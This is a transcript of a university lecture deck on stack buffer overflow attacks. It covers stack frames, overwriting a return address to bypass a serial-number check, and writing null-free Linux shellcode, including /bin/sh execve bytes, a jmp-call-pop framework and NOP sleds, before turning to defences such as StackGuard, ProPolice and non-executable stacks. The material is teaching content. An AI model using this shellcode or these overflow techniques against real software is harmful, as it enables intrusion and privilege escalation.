Presentation is loading. Please wait.

Presentation is loading. Please wait.

Attacks Using Stack Buffer Overflow Boxuan Gu

Published byLucinda Black Modified over 8 years ago

Similar presentations

Presentation on theme: "Attacks Using Stack Buffer Overflow Boxuan Gu"— Presentation transcript:

1 Attacks Using Stack Buffer Overflow Boxuan Gu gub@cse.ohio-state.edu

2 Reference The Art of Computer Virus Research and Defense (Symantec Press) (Paperback)‏ By Peter Szor

3 Outline Background Stack buffer overflow Shell code How to prevent stack buffer overflow

4 Background Many vulnerability of applications are not from their specifications and protocols but from their implementations  Weak implementation of passwords  Buffer Overflow (can be used to redirect the control flow of a program)  race conditions  bugs in permissions

5 Background- Buffer overflow Typical Attack Scenario:  Users enter data into a Web form  Web form is sent to server  Server writes data to buffer, without checking length of input data  Data overflows from buffer  Sometimes, overflow can enable an attack  Web form attack could be carried out by anyone with an Internet connection

6 Background- layout of the Virtual Space of a Process The layout of the virtual space of a process in Linux

7 Cont. Code and data consist of instructions and initialized, uninitialized global and static data respectively; Runtime heap is used for dynamically allocated memory(malloc()); The stack is used whenever a function call is made.

8 Layout Of Stack Grows from high-end address to low-end address (buffer grows from low-end address to high-end address); Return Address- When a function returns, the instructions pointed by it will be executed; Stack Frame pointer(esp)- is used to reference to local variables and function parameters.

9 Example int cal(int a, int b)‏ { int c; c = a + b; return c; } int main ()‏ { int d; d = cal(1, 2); printf("%d\n", d); return; } Stack high-end address low-end address b(2)‏ a(1)‏ ret addr(0x08048229)‏ previous ebp c esp ebp

10 0x08048204 :lea 0x4(%esp),%ecx 0x08048208 :and $0xfffffff0,%esp 0x0804820b :pushl -0x4(%ecx)‏ 0x0804820e :push %ebp 0x0804820f :mov %esp,%ebp 0x08048211 :push %ecx 0x08048212 :sub $0x24,%esp 0x08048215 :movl $0x2,0x4(%esp) ; pass parameter 0x0804821d :movl $0x1,(%esp) ; pass parameter 0x08048224 :call 0x80481f0 0x08048229 :mov %eax,-0x8(%ebp)‏ 0x0804822c :mov -0x8(%ebp),%eax 0x0804822f :mov %eax,0x4(%esp)‏ 0x08048233 :movl $0x80a0c88,(%esp)‏ 0x0804823a :call 0x8048c40 0x0804823f :add $0x24,%esp 0x08048242 :pop %ecx 0x08048243 :pop %ebp 0x08048244 :lea -0x4(%ecx),%esp 0x08048247 :ret Dump of assembler code for function main:

11 Dump of assembler code for function cal: 0x080481f0 :push %ebp 0x080481f1 :mov %esp,%ebp 0x080481f3 :sub $0x10,%esp ; reserve 16 bytes for local variables in stack 0x080481f6 :mov 0xc(%ebp),%eax 0x080481f9 :add 0x8(%ebp),%eax 0x080481fc :mov %eax,-0x4(%ebp)‏ 0x080481ff :mov -0x4(%ebp),%eax 0x08048202 :leave 0x08048203 :ret

12 Layout of Heap Global variables Static variables Dynamically allocated memory

13 Stack Buffer Overflow A buffer overflow occurs when too much data is put into the buffer; C language and its derivatives(C++) offer many ways to put more data than anticipated into a buffer;

14 Example Int bof()‏ { char buffer[8]; // an 8 bytes buffer which is in the stack strcpy(“buffer, “AAAAAAAAAAAAAAAAAAA””); // copy 20 bytes into buffer // this will cause to the content of “ret” to be overwritten; // namely, the return address will be 0x41414141(AAAA)‏ return 1; } int main ()‏ { bof(); // call bof printf(“end\n”); // will never be executed; return 1; } AAAA AAAA (previous EBP)‏ AAAA (RET->printf())‏ AAAA ESP EBP

15 Basic Idea of the Attack using stack buffer overflow Stack grows High address Low address TOP of Stack Attack Code Local variable (buffer)‏ RET String grows Inject malicious code into the virtual space of a process; Modify the content of RET to redirect the execution flow to the malicious code.

16 Example  Program asks for a serial number that attacker does not know  Attacker also does not have source code  Attacker does have the executable (exe)‏ Program quits on incorrect serial number

17 Cont. Note that 0x41 is “A” Looks like ret overwritten by 2 bytes! I think the stack is overwitten by 3 bytes. By trial and error, attacker discovers an apparent buffer overflow

18 Cont. The goal is to exploit a buffer overflow so that the execution flow can be re-directed to 0x00401034.

19 Cont. Find that 401034 is “ @^P4 ” in ASCII ('\0' is 00)‏ Byte order is reversed? Why? X86 processors are “little-endian”

20 Cont. Reverse the byte order to “ 4^P@ ” (\x34\x10\x40\x00) and… Success! We’ve bypassed serial number check by exploiting a buffer overflow Overwrote the return address on the stack

21 Example-Create a shell char shellcode[] = "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46" "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1" "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; int main(){ char *name[2]; name[0] = "/bin/sh"; name[1] = 0x0; execve(name[0], name, 0x0); exit(0); } Shellcode can be looked as a sequence of binary instructions; The purpose of this shellcode is to create a command shell in linux. It can be used to create a shell with root privilege.

22 Cont. void sh()‏ { int *return; return = (int *)&return + 2; // let ret point to the unit containing the return address (*return) = (int)shellcode; // let the return address point to the shellcode (shell code to create a shell)‏ } int main()‏ { sh(); printf("main end :)\n"); return; }

23 Cont. (gdb) disas sh Dump of assembler code for function sh: 0x08048208 :push %ebp 0x08048209 :mov %esp,%ebp 0x0804820b :sub $0x10,%esp 0x0804820e :lea -0x4(%ebp),%eax 0x08048211 :add $0x8,%eax 0x08048214 :mov %eax,- 0x4(%ebp)‏ 0x08048217 :mov - 0x4(%ebp),%edx 0x0804821a :mov $0x80bd6a0,%eax 0x0804821f :mov %eax,(%edx)‏ 0x08048221 :leave 0x08048222 :ret Previous ebp return RET

24 Three issues for injecting codes How to find a location in the stack to inject malicious code? How to generate a shellcode (Attack Code)? How to redirect the execution flow to the shellcode?  If using stack buffer overflow, the content of memory unit storing return address should be modified.  The injected payload should be long enough to do overwriting.

25 How to find a location to inject code If using stack buffer overflow, we might need to locate the stack of a function. Then we need to determine the offset from the bottom or the top of stack to inject the shell code We can use the following code to locate a stack: unsigned long find_start(void)‏ { __asm__("movl %esp, %eax"); } unsigned long find_end(void)‏ { __asm__("movl %ebp, %eax"); }

26 Cont. unsigned long find_start(void)‏ { __asm__("movl %esp, %eax"); } unsigned long find_end(void)‏ { __asm__("movl %ebp, %eax"); } int main()‏ { printf("0x%x\n",find_start()); printf("0x%x\n",find_end()); }

27 Shell code Shellcode is defined as a set of instructions which is injected and then is executed by an exploited program; Shellcode is used to directly manipulate registers and the function of a program; Most of shellcodes use system call to do malicious behaviors; System calls is a set of functions which allow you to access operating system-specific functions such as getting input, producing output, exiting a process;

28 How to execute a system call in Linux? Use libc wrappers  Ex: read, write etc;  Works indirectly with assembly code to execute system calls; Directly use assembly code  System call via software interrupts, for example int 0x80; In Linux, a shell code uses int 0x80 to raise system calls.

29 The process of executing a system call The specific system call is loaded into EAX; Arguments to the system call function are placed in other registers; The Instruction int 0x80 is executed; The CPU switches to Kernel mode; The system call function is executed. Example: main()‏ { exit(0); }

30 Cont. gcc -g -static -o exit exit.c gdb exit Arlington:/home/src/shellcodes/code/ch03# gdb exit GNU gdb 6.7.1-debian Copyright (C) 2007 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i486-linux-gnu"... Using host libthread_db library "/lib/i686/cmov/libthread_db.so.1". (gdb) disas _exit Dump of assembler code for function _exit: 0x0804df4c :mov 0x4(%esp),%ebx 0x0804df50 :mov $0xfc,%eax 0x0804df55 :int $0x80 0x0804df57 :mov $0x1,%eax 0x0804df5c :int $0x80 0x0804df5e :hlt End of assembler dump.

31 Write a shell code for exit()‏ The shell code should do the following:  Store the value of 0 into EBX;  Store the value of 1 into EAX;  Execute int 0x80 instruction

32 Cont. Section.text global _start _start: mov ebx, 0 mov eax, 1 int 0x80 First, we write ASM codes (exit.asm) as follows:

33 Cont. Arlington:/home/src/shellcodes/# nasm -f elf exit.asm Arlington:/home/src/shellcodes/# ld -o exit_1 exit.o Arlington:/home/src/shellcodes/# objdump -d exit_1 exit_1: file format elf32-i386 Disassembly of section.text: 08048060 : 8048060:bb 00 00 00 00 mov $0x0,%ebx 8048065:b8 01 00 00 00 mov $0x1,%eax 804806a:cd 80 int $0x80 Red words can be used as the shell code.

34 Cont. char shellcode[] = "\xbb\x00\x00\x00\x00" "\xb8\x01\x00\x00\x00" "\xcd\x80"; int main()‏ { int *return; return = (int *)&return + 2; (*return) = (int)shellcode; }

35 Injectable Shellcode Null (\x00) will cause shellcode to fail when injected into a character array because \x00 is used to terminate strings; Injectable shellcode can't contain \x00; shellcode[] = "\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80" is not an injectable shellcode; How to remove \x00? Use “xor ebx, ebx” to replace “mov ebx, 0” Use “mov al, 1 ” to replace “mov eax, 1”

36 Cont. bb 00 00 00 00 mov $0x0,%ebx b8 01 00 00 00 mov $0x1,%eax cd 80 int $0x80 31 db xor %ebx, %ebx b0 01 mov $0x1,%al cd 80 int 0x80 shellcode[]=”\x31\xdb\xb0\x01\xcd\x80” After the transformation, the code is changed to :

37 Questions What is a stack frame? What is a return address? Can we inject shellcodes into any area of the address spaces of processes?

38 A framework for injectable shellcode Jmp short GotoCall shellcode: pop esi // esi will contain the address of '/bin/sh' GotoCall: Call shellcode // GetPC code Db '/bin/sh'

39 GetPC Code Call fsave/fstenv Can be used to get the address of last FPU instruction  fldz  fnstenv [esp-12]  pop ecx  add cl, 10  nop  ECX will hold the address of the EIP.

40 An Example section.text global _start _start: jmp short GotoCall shellcode: pop esi xor eax, eax mov byte [esi + 7], al lea ebx, [esi] mov long [esi + 8], ebx mov long [esi + 12], eax mov byte al, 0x0b mov ebx, esi lea ecx, [esi + 8] lea edx, [esi + 12] int 0x80 GotoCall: Call shellcode // GetPC Code db '/bin/shJAAAAKKKK' // AAAA and KKKK can be parameters for system calls

41 NOP Sled Determining the correct offset for injecting code is not easy; NOP (non operation) sled can be used to increase the number of potential offsets; Generally, we can fill in the beginning of shellcode with NOPs. The opcode for NOP is 0x90 EX: shellcode[]=”\x90\x90\x90\x31\xdb\xb0\x01\xcd\x80” Some FPU, SSE, MMX instructions can also be used as sled.

42 Summary of Launching An Attack Find a buffer overflow that can be used to redirect the control flow of the victim program  Stack Buffer Overflow  Heap Buffer Overflow Inject a segment of malicious shellcode

43 How to prevent stack buffer overflow? Stack Guard  In a stack, a canary word is placed after return address whenever a function is called;  The canary will be checked before the function returns. If value of canary is changed, then it indicates an malicious behavior. 6. Unix Stack Frame Arguments Old Base Pointer Return Address Local Variables Lower address Higher address Canary Value

44 Cont. Canary can still be intact if the attacker overwrites it with the correct value  Solution – use “random canary” value  Use “terminator canary” – consists of all string terminator sequences – NULL, ‘\r’, ‘\n’, -1… Attacker can still point to the ‘return address’ and change it, without worrying about the canary  This is a short-coming of StackGuard  Can be dealt by XORing the canary value and ‘return address’ to detect if ‘return address’ has changed

45 Stack Shield. Stack Shield  Copy RET address into an unoverflowable memory region;  The values of two RET addresses will be compared before a function returns;  If the values are different, then an malicious exploitation occurs;  Needs another stack-like data structure to maintain RET addresses.

46 ProPolice Perhaps most sophisticated compiler protection Rearrange local variables such that char buffers always are allocated at bottom addresses ( top of the stack), and are guarded by a Guard Value Does not work fine with small buffers – somewhat unstable 7. Unix Stack Frame Arguments Old Base Pointer Return Address Local Variables and Pointers Lower address Higher address Guard Value Local char buffers

47 Cont. Non-Executable stack;  Return-to-libc exploitation might occur Randomization.

Download ppt "Attacks Using Stack Buffer Overflow Boxuan Gu"

Similar presentations

Recitation 4 Outline Buffer overflow –Practical skills for Lab 3 Code optimization –Strength reduction –Common sub-expression –Loop unrolling Reminders.

Recitation 4 Outline Buffer overflow –Practical skills for Lab 3 Code optimization –Strength reduction –Common sub-expression –Loop unrolling Reminders.
Smashing the Stack for Fun and Profit

Smashing the Stack for Fun and Profit
Introduction to Information Security ROP – Recitation 5 nirkrako at post.tau.ac.il itamarg at post.tau.ac.il.

Introduction to Information Security ROP – Recitation 5 nirkrako at post.tau.ac.il itamarg at post.tau.ac.il.
1 CHAPTER 8 BUFFER OVERFLOW. 2 Introduction One of the more advanced attack techniques is the buffer overflow attack Buffer Overflows occurs when software.

1 CHAPTER 8 BUFFER OVERFLOW. 2 Introduction One of the more advanced attack techniques is the buffer overflow attack Buffer Overflows occurs when software.
Buffer Overflow. Process Memory Organization.

Buffer Overflow. Process Memory Organization.
1 Homework Reading –PAL, pp 201-216, 297-312 Machine Projects –Finish mp2warmup Questions? –Start mp2 as soon as possible Labs –Continue labs with your.

1 Homework Reading –PAL, pp , Machine Projects –Finish mp2warmup Questions? –Start mp2 as soon as possible Labs –Continue labs with your.
Assembly תרגול 8 פונקציות והתקפת buffer.. Procedures (Functions) A procedure call involves passing both data and control from one part of the code to.

Assembly תרגול 8 פונקציות והתקפת buffer.. Procedures (Functions) A procedure call involves passing both data and control from one part of the code to.
September 22, 2014 Pengju (Jimmy) Jin Section E

September 22, 2014 Pengju (Jimmy) Jin Section E
University of Washington CSE 351 : The Hardware/Software Interface Section 5 Structs as parameters, buffer overflows, and lab 3.

University of Washington CSE 351 : The Hardware/Software Interface Section 5 Structs as parameters, buffer overflows, and lab 3.
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-

Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
Introduction to InfoSec – Recitation 2 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Introduction to InfoSec – Recitation 2 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
Fall 2008CS 334: Computer SecuritySlide #1 Smashing The Stack A detailed look at buffer overflows as described in Smashing the Stack for Fun and Profit.

Fall 2008CS 334: Computer SecuritySlide #1 Smashing The Stack A detailed look at buffer overflows as described in Smashing the Stack for Fun and Profit.
Lecture 0 Appendix on Implementation Threats Material from Warren Page & Chpt 11, Information Security by Mark Stamp.

Lecture 0 Appendix on Implementation Threats Material from Warren Page & Chpt 11, Information Security by Mark Stamp.
Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)

Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)
Buffer Overflows : An In-depth Analysis. Introduction Buffer overflows were understood as early as 1972 The legendary Morris Worm made use of a Buffer.

Buffer Overflows : An In-depth Analysis. Introduction Buffer overflows were understood as early as 1972 The legendary Morris Worm made use of a Buffer.
Introduction: Exploiting Linux. Basic Concepts Vulnerability A flaw in a system that allows an attacker to do something the designer did not intend,

Introduction: Exploiting Linux. Basic Concepts Vulnerability A flaw in a system that allows an attacker to do something the designer did not intend,
Practical Session 4. Labels Definition - advanced label: (pseudo) instruction operands ; comment valid characters in labels are: letters, numbers, _,

Practical Session 4. Labels Definition - advanced label: (pseudo) instruction operands ; comment valid characters in labels are: letters, numbers, _,
Mitigation of Buffer Overflow Attacks

Mitigation of Buffer Overflow Attacks
1 #include void silly(){ char s[30]; gets(s); printf(%s\n,s); } main(){ silly(); return 0; }

1 #include void silly(){ char s[30]; gets(s); printf("%s\n",s); } main(){ silly(); return 0; }
University of Washington Today Happy Monday! HW2 due, how is Lab 3 going? Today we’ll go over:  Address space layout  Input buffers on the stack  Overflowing.

University of Washington Today Happy Monday! HW2 due, how is Lab 3 going? Today we’ll go over:  Address space layout  Input buffers on the stack  Overflowing.

Similar presentations

Ads by Google